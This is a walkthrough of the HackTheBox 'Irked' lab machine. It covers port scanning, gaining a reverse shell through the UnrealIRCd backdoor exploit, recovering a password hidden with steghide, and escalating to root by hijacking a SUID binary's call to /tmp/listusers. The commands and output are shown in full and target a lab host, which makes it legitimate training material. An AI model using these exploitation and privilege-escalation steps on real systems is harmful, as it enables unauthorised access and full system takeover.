Irked

tags: HTB Easy Linux OSCP
Platform: Hackthebox
Difficult: Easy
S.O.: Linux

Enumeration

Nmap

To get started, we run a quick open ports scan.

$ nmap -p- -T4 10.10.10.117
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-14 19:37 CEST
Nmap scan report for 10.10.10.117
Host is up (0.094s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
6697/tcp  open  ircs-u
8067/tcp  open  infi-async
47160/tcp open  unknown
65534/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 162.14 seconds

Now that we know the open ports, let's scan them in depth.

$ nmap -A -Pn -p 22,80,111,6697,8067,47160,65534 10.10.10.117
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-14 19:41 CEST
Nmap scan report for 10.10.10.117
Host is up (0.093s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn´t have a title (text/html).
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          47160/tcp   status
|   100024  1          48955/udp   status
|   100024  1          54720/tcp6  status
|_  100024  1          58993/udp6  status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
47160/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.4 (95%), Linux 4.2 (95%), Linux 4.8 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 6697/tcp)
HOP RTT      ADDRESS
1   93.68 ms 10.10.14.1
2   93.72 ms 10.10.10.117

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.65 seconds

Exploitation

Getting shell

As we can see, it have an UnrealIRCd server installed and running. Searching the internet we can find a backdoor that should give us a shell.

We need to edit it and enter our IP and the port we want in these lines.

# Sets the local ip and port (address and port to listen on)
local_ip = ''  # CHANGE THIS
local_port = ''  # CHANGE THIS 

Now whit a terminal listening we just have to run the exploit like python3 UnrealIRCd.py -payload python 10.10.10.117 8067.

$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.117] 50785
[email protected]:~/Unreal3.2$ id
id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)
[email protected]:~/Unreal3.2$

Post exploitation

Privilege escalation: irdc to djmardov

Enumeration

Bash History

Looking at the bash_history file we can see that a file called .backup has recently been used inside /home/djmardov/

[email protected]:~$ cat .bash_history 
[...]
cd djmardov
ls
cd Documents
ls -lah
cat .backup
[...]

If we look at its content it shows us what it says to be a password for something hidden with steg

[email protected]:~$ cd /home/djmardov/Documents/
[email protected]:/home/djmardov/Documents$ ls -la
total 16
drwxr-xr-x  2 djmardov djmardov 4096 May 15  2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov  3  2018 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
-rw-------  1 djmardov djmardov   33 May 15  2018 user.txt
[email protected]:/home/djmardov/Documents$ cat .backup 
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
[email protected]:/home/djmardov/Documents$

If we look inside the website, we can find the following image.

Steghide

And when downloading it and using steghide on it with the password obtained in the .backup file we managed to extract a file called pass.txt that contains the password of the user djmardov.

$ steghide --extract -sf irked.jpg
Anotar salvoconducto: 
anot� los datos extra�dos e/"pass.txt".
$ cat pass.txt
Kab6h+m+bbp2J:HG

And now we can use the password to connect via SSH and read the user flag.

$ ssh [email protected]
[email protected]'s password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 15 08:56:32 2018 from 10.33.3.3
[email protected]:~$ cd Documents/
[email protected]:~/Documents$ cat user.txt 
CENSORED_FLAG
[email protected]:~/Documents$

Privilege escalation: djmardov to root

SUID

[email protected]:~/.cache$ find / -perm /4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount

We have a strange file /usr/bin/viewuser. Let's download it to our machine and see what it does.

Viewuser

This is the pseudo code of the binary extracted with Ghidra.

undefined4 main(undefined1 param_1) {
  puts("This application is being devleoped to set and test user permissions");
  puts("It is still being actively developed");
  system("who");
  setuid(0);
  system("/tmp/listusers");
  return 0;
}

As we can see, we should be able to create a script called /tmp/listusers that executes /bin/bash and it will be executed as root thanks to setuid (0);.

[email protected]:~$ echo "/bin/bash" > /tmp/listusers
[email protected]:~$ chmod 777 /tmp/listusers

Now we execute the SUID binary and we will be root!

[email protected]:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2021-04-14 13:40 (:0)
djmardov pts/2        2021-04-14 14:29 (10.10.14.2)
[email protected]:~# whoami
root
[email protected]:~# id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
[email protected]:~# cat /root/root.txt
CENSORED_FLAG